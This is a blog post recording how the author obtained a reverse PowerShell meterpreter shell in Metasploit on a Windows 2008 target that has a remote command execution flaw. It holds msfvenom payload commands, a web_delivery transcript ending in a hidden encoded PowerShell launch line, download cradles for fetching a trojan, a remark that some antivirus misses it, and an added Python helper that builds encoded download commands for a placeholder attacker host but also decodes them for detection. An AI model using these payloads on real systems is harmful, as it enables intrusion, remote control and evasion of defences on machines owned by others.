Several ways to reverse a PowerShell shell to msf


While working on a small project I needed to reverse a PowerShell shell to msf; I ran a few experiments locally and on the target box and am recording the payloads here.

 

1. Generating a ps1 trojan with msfvenom

msf generates the ps1, which is uploaded to the target and executed remotely. A .ps1 cannot be executed directly from cmd, though; the following cmd command changes the default handler for PowerShell scripts to powershell.exe. Note that this rewrites the system-wide file-type association (HKCR), so it needs administrator rights, and the script is still subject to the execution policy; running powershell -ExecutionPolicy Bypass -File test.ps1 avoids touching the association at all.

ftype Microsoft.PowerShellScript.1="%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe" "%1"

 

Generate the ps1 file with msfvenom (-f psh-reflection emits a PowerShell script that loads the stager in memory rather than dropping a PE; the payload architecture must match the powershell.exe that runs it):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=REDACTED LPORT=4545 --arch x64 --platform windows -f psh-reflection -o test.ps1

 

Running test.ps1 directly from the local cmd then gets a meterpreter in msf, but uploading it to the target and trying there failed.

 

2. Generating the payload with web_delivery

    msf5 exploit(multi/handler) > use exploit/multi/script/web_delivery
    [*] Using configured payload python/meterpreter/reverse_tcp
    msf5 exploit(multi/script/web_delivery) > info
    
           Name: Script Web Delivery
         Module: exploit/multi/script/web_delivery
       Platform: Python, PHP, Windows, Linux, OSX
           Arch:
     Privileged: No
        License: Metasploit Framework License (BSD)
           Rank: Manual
      Disclosed: 2013-07-19
    
    Provided by:
      Andrew Smith "jakx" <jakx.ppr@gmail.com>
      Ben Campbell <eat_meatballs@hotmail.co.uk>
      Chris Campbell
      Casey Smith
      Trenton Ivey
      g0tmi1k
      bcoles <bcoles@gmail.com>
      phra
    
    Available targets:
      Id  Name
      --  ----
      0   Python
      1   PHP
      2   PSH
      3   Regsvr32
      4   pubprn
      5   PSH (Binary)
      6   Linux
      7   Mac OS X
    
    Check supported:
      No
    
    Basic options:
      Name     Current Setting  Required  Description
      ----     ---------------  --------  -----------
      SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
      SRVPORT  8080             yes       The local port to listen on.
      SSL      false            no        Negotiate SSL for incoming connections
      SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
      URIPATH                   no        The URI to use for this exploit (default is random)
    
    Payload information:
    
    Description:
      This module quickly fires up a web server that serves a payload. The
      provided command which will allow for a payload to download and
      execute. It will do it either specified scripting language
      interpreter or "squiblydoo" via regsvr32.exe for bypassing
      application whitelisting. The main purpose of this module is to
      quickly establish a session on a target machine when the attacker
      has to manually type in the command: e.g. Command Injection, RDP
      Session, Local Access or maybe Remote Command Execution. This attack
      vector does not write to disk so it is less likely to trigger AV
      solutions and will allow privilege escalations supplied by
      Meterpreter. When using either of the PSH targets, ensure the
      payload architecture matches the target computer or use SYSWOW64
      powershell.exe to execute x86 payloads on x64 machines. Regsvr32
      uses "squiblydoo" technique for bypassing application whitelisting.
      The signed Microsoft binary file, Regsvr32, is able to request an
      .sct file and then execute the included PowerShell command inside of
      it. Similarly, the pubprn target uses the pubprn.vbs script to
      request and execute a .sct file. Both web requests (i.e., the .sct
      file and PowerShell download/execute) can occur on the same port.
      "PSH (Binary)" will write a file to the disk, allowing for custom
      binaries to be served up to be downloaded and executed.
    
    References:
      https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html
      https://www.pentestgeek.com/2013/07/19/invoke-shellcode/
      http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/
      https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
      https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
      https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
      https://iwantmore.pizza/posts/amsi.html
    
    msf5 exploit(multi/script/web_delivery) > set target 2
    target => 2
    msf5 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
    payload => windows/x64/meterpreter/reverse_tcp
    msf5 exploit(multi/script/web_delivery) > set lhost REDACTED
    lhost => REDACTED
    msf5 exploit(multi/script/web_delivery) > options
    
    Module options (exploit/multi/script/web_delivery):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
       SRVPORT  8080             yes       The local port to listen on.
       SSL      false            no        Negotiate SSL for incoming connections
       SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH                   no        The URI to use for this exploit (default is random)
    
    
    Payload options (windows/x64/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     REDACTED         yes       The listen address (an interface may be specified)
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       2   PSH
    
    
    msf5 exploit(multi/script/web_delivery) > run
    [*] Exploit running as background job 0.
    [*] Exploit completed, but no session was created.
    
    [*] Started reverse TCP handler on REDACTED:4444
    msf5 exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/FVzfFyIpE3nU
    [*] Local IP: http://REDACTED:8080/FVzfFyIpE3nU
    [*] Server started.
    [*] Run the following command on the target machine:
    powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZw...[long Base64 blob omitted]...HcASQBNAFcAMABpADcAMABvAGwAJwApACkAOwA=

(I used this method again later and was surprised to find that some AV products don't block it at all.)

 

3. Downloading the payload remotely with PowerShell, method 1

"c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "invoke-webrequest -uri '<trojan download URL>' -outfile '<save path including file name>'"

Note that Invoke-WebRequest only exists from Windows PowerShell 3.0 onward; a stock Windows Server 2008 box ships with PowerShell 2.0 at most, so this cradle fails there and the WebClient form in the next section is the one to use.

 

4. Downloading the payload remotely with PowerShell, method 2

Tested successfully locally. If you use a Base64 encoding tool, remove the double quotes after powershell, otherwise the encoded command fails to execute. Encoder download address: https://github.com/930201676/runtime-exec-payloads

powershell "$client=new-object System.Net.WebClient;$client.DownloadFile('<trojan download URL>', '<save path including file name>')"
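The -e blob that web_delivery printed in section 2 and the Base64 encoding step of section 4 are the same mechanism: powershell.exe's -EncodedCommand takes Base64 of the command text encoded as UTF-16LE (what PowerShell calls "Unicode"), not UTF-8, and only the script body is encoded, never the surrounding powershell "..." wrapper. The Python below is an added example, not code from the original post or from Metasploit: it builds that argument for the WebClient cradle above and decodes the blob back out of a command line, which is also how a defender reads these in process-creation logs. The host name, file paths and the -e one-liner format are placeholders chosen for this example; the only page data used is the visible start of the transcript's blob.

```python
"""Added example: the encoding behind `powershell -e` (assumed placeholders, see lead-in)."""
import base64
import re
from typing import Optional


def encode_command(script: str) -> str:
    """Return the Base64 argument PowerShell expects after -EncodedCommand (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command. Tolerates stripped '=' padding and a blob that was cut
    mid-character (like the truncated transcript above) by dropping the trailing odd byte."""
    blob = blob.strip()
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    return raw[: len(raw) & ~1].decode("utf-16-le")


def encoded_invocation(script: str) -> str:
    """The one-liner to type into cmd or an RCE: only the script body is encoded; the
    `powershell "..."` wrapper and its quotes must NOT be part of the encoded text."""
    return f"powershell.exe -nop -w hidden -e {encode_command(script)}"


# powershell.exe accepts -e, -ec and any unambiguous prefix of -EncodedCommand,
# with either '-' or '/' as the switch character.
_ENC_RE = re.compile(r"(?:^|\s)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def extract_encoded(cmdline: str) -> Optional[str]:
    """Decode the -EncodedCommand payload from a process command line, or None if absent."""
    m = _ENC_RE.search(cmdline)
    return decode_command(m.group(1)) if m else None


# Constructed download cradle: the WebClient form from section 4 with placeholder
# host and path (ATTACKER_HOST and the Temp path are not from the original post).
CRADLE = ("$client=new-object System.Net.WebClient;"
          "$client.DownloadFile('http://ATTACKER_HOST/payload.exe','C:\\Windows\\Temp\\payload.exe')")

# The visible start of the blob web_delivery printed in section 2.
WEB_DELIVERY_PREFIX = "WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZw"


if __name__ == "__main__":
    print(encoded_invocation(CRADLE))
    # Decoding the transcript's prefix shows what the stager starts with:
    # "[Net.ServicePointMana" (the certificate-validation override).
    print(decode_command(WEB_DELIVERY_PREFIX))
    # Base64 of the UTF-8 bytes would be read by PowerShell as UTF-16 and turn into
    # mojibake, which is the usual reason a hand-encoded -e command "does nothing".
    print(extract_encoded(encoded_invocation(CRADLE)) == CRADLE)
```

Decoding the first 58 characters of the blob from the transcript gives "[Net.ServicePointMana", so the stager begins by disabling certificate validation; the same decode over a logged command line is the check a detection engineer runs before deciding what an encoded PowerShell launch actually did.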

 

5. Summary

The local environment is Win10 and the target is Win2008. The target has a remote command execution vulnerability, but because its web application redirects every jsp request (whether the page exists or not) to the login page when not logged in, a trojan can be written directly but cannot be connected to, so I tried reversing a PowerShell shell to msf instead. Being unfamiliar with PowerShell and remote command execution, I went down a lot of dead ends over encoding, special characters and so on. Corrections from more experienced people are welcome (I'm still very green at this).

 

 


粵ICP備18138465號   © 2018-2025 CODEPRJ.COM